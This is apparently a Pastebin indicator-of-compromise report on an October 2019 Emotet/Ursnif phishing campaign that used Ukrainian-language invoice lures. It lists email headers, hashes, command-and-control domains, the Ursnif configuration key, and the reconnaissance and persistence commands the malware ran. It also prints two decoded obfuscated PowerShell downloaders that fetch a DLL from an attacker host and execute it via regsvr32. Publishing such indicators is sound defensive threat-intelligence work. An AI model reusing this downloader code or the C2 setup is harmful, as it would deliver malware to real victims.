SHARE
TWEET

#emotet_ursnif_171019

VRad Oct 18th, 2019 (edited) 405 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #emotet_doc #ursnif_payload #W97M #PowerShell #ENC #inject
  2.  
  3. https://pastebin.com/1XfkVE5e
  4.  
  5. previous_contact: n/a
  6.  
  7. FAQ: https://radetskiy.wordpress.com/2018/04/03/ioc_ursnif_020418/
  8.  
  9. attack_vector
  10. --------------
  11. email attach .DOC > macro > b64 > powershell > GET bin > %user%\*.bin > %user%\appdata\roaming\microsoft\audizfwk\adsnwave.dll
  12.  
  13. email_headers
  14. --------------
  15. #1
  16. Return-Path: <noreply@princefinance.princefamily33.com>
  17. Received: from gateway36.websitewelcome.com (gateway36.websitewelcome.com [192.185.201.2])
  18. Received: from cm14.websitewelcome.com (cm14.websitewelcome.com [100.42.49.7])
  19. Received: from box5254.bluehost.com ([162.241.225.96])
  20. Received: from [89.253.149.192] (port=53724 helo=5.61.57.146)
  21. Subject: терміново
  22. From: "Tetyana.Olekseevna@monolit.dn.ua" <noreply@princefinance.princefamily33.com>
  23. Date: Thu, 17 Oct 2019 16:35:57 +0300
  24. X-Source-IP: 89.253.149.192
  25. X-Source-Sender: (5.61.57.146) [89.253.149.192]:53724
  26. X-Source-Auth: noreply@princefinance.princefamily33.com
  27.  
  28. #2
  29. Return-Path: <christina@princeonlinewebdesign.com>
  30. Received: from gateway22.websitewelcome.com (gateway22.websitewelcome.com [192.185.46.142])
  31. Received: from cm16.websitewelcome.com (cm16.websitewelcome.com [100.42.49.19])
  32. Received: from box5254.bluehost.com ([162.241.225.96])
  33. Received: from [178.75.241.39] (port=9647 helo=5.61.57.146)
  34. Date: Thu, 17 Oct 2019 16:35:57 +0300
  35. From: "Zoryana.Volodimirovna@topyachts.com.ua" <christina@princeonlinewebdesign.com>
  36. Subject: Рахунок-Фактура №340
  37. X-Source-IP: 178.75.241.39
  38. X-Source-Sender: (5.61.57.146) [178.75.241.39]:9647
  39. X-Source-Auth: christina@princeonlinewebdesign.com
  40.  
  41. #3
  42. Return-Path: <betty@upstatehealthcareservices.com>
  43. Received: from gproxy6-pub.mail.unifiedlayer.com (outbound-ss-348.hostmonster.com [74.220.202.212])
  44. Received: from cmgw15.unifiedlayer.com (unknown [10.9.0.15])
  45. Received: from box787.bluehost.com ([66.147.244.87])
  46. Received: from [62.176.68.133] (port=61085 helo=5.61.57.146)
  47. From: "Ivan.Volodimirovich@scalehobby.com.ua" <betty@upstatehealthcareservices.com>
  48. Date: Thu, 17 Oct 2019 16:22:40 +0300
  49. Subject: Рахунок за Газ №9282
  50. X-Source-IP: 62.176.68.133
  51. X-Source-Sender: (5.61.57.146) [62.176.68.133]:61085
  52. X-Source-Auth: betty@upstatehealthcareservices.com
  53.  
  54. files
  55. --------------
  56. SHA-256     f044e77427aa73ac8242b0084c4184b3f156bb20980b23afa7c7a2cc8ae87287
  57. File name   rahunok#0027980.doc [CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word]
  58. File size   285 KB (291840 bytes)
  59.  
  60. SHA-256     3bd1f4bfd092ae54b46d5b562f4ad0bcef83322745dd68bdf78ede3e58f6e087
  61. File name   rahunok#0037239.doc [CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word]
  62. File size   329.5 KB (337408 bytes)
  63.  
  64. SHA-256     e2372222abafaf63e079bb5c10d7cb28788128beed12c4194f26922e16c3be3b
  65. File name   hfsjaoipqewfbwoei.bin (point.dll)   [PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit]
  66. File size   1.1 MB (1150976 bytes)
  67.  
  68. activity
  69. **************
  70. PL_SCR          161.117.39.210      limitsno{.} at/hfsjaoipqewfbwoei.bin
  71.  
  72. C2          47.74.186.51        vip-statistic{.} at
  73.  
  74. + @bomccss
  75. #ursnif config
  76. serpent_key: Dfei8OoQ0xhjTyql
  77. botnet-id: 700
  78. version: 217027
  79.  
  80. c2:
  81. cxzko43pnr7ujnte[.]onion
  82. vip-statistic[.]at
  83. intrade-support[.]at
  84. fresh-girls[.]at
  85.  
  86.  
  87. netwrk
  88. --------------
  89. [ssl]
  90. 216.58.201.78   google.com      Client Hello
  91.  
  92. [http]
  93. 47.74.186.51        limitsno{.} at      GET /hfsjaoipqewfbwoei.bin          HTTP/1.1    noUA   
  94. 47.74.186.51        vip-statistic{.} at GET /images/NFVfNmnFntzllAW_2/..../P1.gif   HTTP/1.1    Mozilla/4.0
  95. 47.74.186.51        vip-statistic{.} at POST /images/ZP9eBpRUFTo1VIxz/.../C.bmp     HTTP/1.1    Mozilla/4.0
  96.  
  97. comp
  98. --------------
  99. powershell.exe  2832    TCP localhost   49168   47.74.186.51    80  ESTABLISHED
  100. explorer.exe    1988    TCP localhost   49169   216.58.201.78   443 ESTABLISHED
  101. explorer.exe    1988    TCP localhost   49170   216.58.201.68   443 ESTABLISHED
  102. explorer.exe    1988    TCP localhost   49171   47.74.186.51    80  ESTABLISHED
  103. explorer.exe    1988    TCP localhost   49172   5.61.57.146 80  ESTABLISHED
  104.  
  105. proc
  106. --------------
  107. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  108. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enco (base64)
  109. "C:\Windows\system32\regsvr32.exe" /s C:\Users\operator\nKUXcZ.bin
  110. C:\Windows\system32\control.exe /?
  111. "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL /?
  112.  
  113. C:\Windows\system32\cmd.exe
  114. cmd.exe /C "nslookup myip.opendns.com resolver1.opendns.com > C:\tmp\415B.bi1"
  115. cmd /C "echo -------- >> C:\tmp\415B.bi1"
  116. "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
  117.  
  118. cmd /C "systeminfo.exe > C:\tmp\A13.bin1"
  119. C:\Windows\system32\systeminfo.exe
  120.  
  121. cmd /C "net view >> C:\tmp\A13.bin1"
  122. C:\Windows\system32\net.exe net  view
  123.  
  124. cmd /C "nslookup 127.0.0.1 >> C:\tmp\A13.bin1"
  125. cmd /C "tasklist.exe /SVC >> C:\tmp\A13.bin1"
  126.  
  127. cmd /C "driverquery.exe >> C:\tmp\A13.bin1"
  128. cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\tmp\A13.bin1"
  129.  
  130. persist
  131. --------------
  132. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run              18.10.2019 14:07   
  133.  
  134. crypssec    Free Age    SportsSignup Meat  
  135. c:\users\operator\appdata\roaming\microsoft\audizfwk\adsnwave.dll   06.10.2019 13:51   
  136.  
  137. @rundll32 "C:\Users\operator\AppData\Roaming\Microsoft\AudizFwk\adsnwave.dll",DllRegisterServer
  138.  
  139. drop
  140. --------------
  141. C:\Users\operator\nKUXcZ.bin
  142. C:\Users\operator\AppData\Roaming\Microsoft\AudizFwk\adsnwave.dll
  143. C:\tmp\A13.bin1     - zip _ extracted info !!!
  144. C:\tmp\415B.bi1     - zip _ extracted info !!!
  145. C:\tmp\D5D9.bin     - zip _ extracted info !!!
  146. C:\tmp\422B.bin     - zip _ extracted info !!!
  147. C:\tmp\2BF9.bin     - zip _ extracted info !!!
  148. C:\tmp\4DC3.bin     - zip _ extracted info !!!
  149. C:\tmp\3083.bin     - zip _ extracted info !!!
  150.  
  151. decoded b642powershell
  152. --------------
  153. #1
  154. $yozninjdjc="wxvhw";
  155. $kjqpsfw = "nKUXcZ";
  156. $kyvisokdvpou="iisvbivwcdfv";
  157. $bduhtq=$env:userprofile+"\"+$kjqpsfw+".bin";
  158. $shofvhgo="hfaho";
  159. $rwwci=&("new-object") net.webclient;
  160. $mznbayyscbf="clmvzpwymfxtqyuuq";
  161. $mtfyqp="http://limitsno{.} at/hfsjaoipqewfbwoei.bin";
  162. $hxpdmkdtmrg="kclcrunb";
  163. Function dwnld{
  164. $ndrrgwesufj="bqdtsgtsy";
  165. try{
  166. $ubjlvybhksmvmqz="svebvywesqwpbtt";
  167. $rwwci."DownloadFile"($mtfyqp, $bduhtq);
  168. $nosvyxzfejquwqm="jaqaiyxlv";
  169. If ((.("Get-Item") $bduhtq)."length" -ge 200000) {
  170. $pnpeirog="kmcyuo";
  171. $ugvjgt = Start-Process -FilePath "regsvr32.exe" -Args "/s $bduhtq" -Wait -NoNewWindow -PassThru;
  172. $ksecir="jvnvnwurbfdxqygqf";
  173. } else {
  174. $mhmwvmqfuybxwur="drffczm";
  175. dwnld;
  176. $pemmvoigqmsza="jyeqziuppapb";
  177. }
  178. $cqhccbph="gvuz";
  179. }catch{
  180. $rcvwrhfjqqxxch="mqeezcoacfemgpkzkd";
  181. dwnld;
  182. $vwdggtfwd="ovjvyghtjfxrnktgt";
  183. }}dwnld;
  184. $zbadv="vccbbnzdpdyqgcv";
  185.  
  186. #2
  187. $zhsiziqtdjjsyfye="nxoyyqtocw";
  188. $mgvtio = "UJqEF";
  189. $ithgawkqu="wgpqgqgnhjruhliad";
  190. $yueeoa=$env:userprofile+"\"+$mgvtio+".bin";
  191. $izbblp="zlzhdcptbhaunoglez";
  192. $ngvqvqb=&("new-object") net.webclient;
  193. $kltkpujnqzfofb="dzygqluhywhhvtx";
  194. $nslldzj="http://limitsno{.} at/hfsjaoipqewfbwoei.bin";
  195. $rbntzlbqkulv="vvrfbdvtoo";
  196. Function dwnld{
  197. $lazaxcmudbef="wzgiffoctszol";
  198. try{
  199. $wrqkxxidhtjrrcq="bviazvtzbmwpoiz";
  200. $ngvqvqb."DownloadFile"($nslldzj, $yueeoa);
  201. $wurllwckcoaobk="cwnwbf";
  202. If ((.("Get-Item") $yueeoa)."length" -ge 200000) {
  203. $quyqejvsjujj="mzoffmbtc";
  204. $jdjpil = Start-Process -FilePath "regsvr32.exe" -Args "/s $yueeoa" -Wait -NoNewWindow -PassThru;
  205. $gzvivurflv="koherilwrbkvczpi";
  206. } else {
  207. $ypcmgzp="zkupghelnqeegzm";
  208. dwnld;
  209. $zgxifpixbe="bwoffieyelusq";
  210. }
  211. $jbialh="huodfndgmg";
  212. }catch{
  213. $yjkwithuhhapy="ilcdki";
  214. dwnld;
  215. $xlgnju="gpstdwckvbm";
  216. }}dwnld;
  217. $gxpfk="ehxqxmwggmw";
  218.  
  219.  
  220. # # #
  221. https://www.virustotal.com/gui/file/f044e77427aa73ac8242b0084c4184b3f156bb20980b23afa7c7a2cc8ae87287/details
  222. https://www.virustotal.com/gui/file/3bd1f4bfd092ae54b46d5b562f4ad0bcef83322745dd68bdf78ede3e58f6e087/details
  223. https://www.virustotal.com/gui/file/e2372222abafaf63e079bb5c10d7cb28788128beed12c4194f26922e16c3be3b/details
  224. https://analyze.intezer.com/#/analyses/4db134a6-ebba-4515-bb5e-1b6ef9ac81f1
  225.  
  226.  
  227. VR
  228.  
  229. @
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top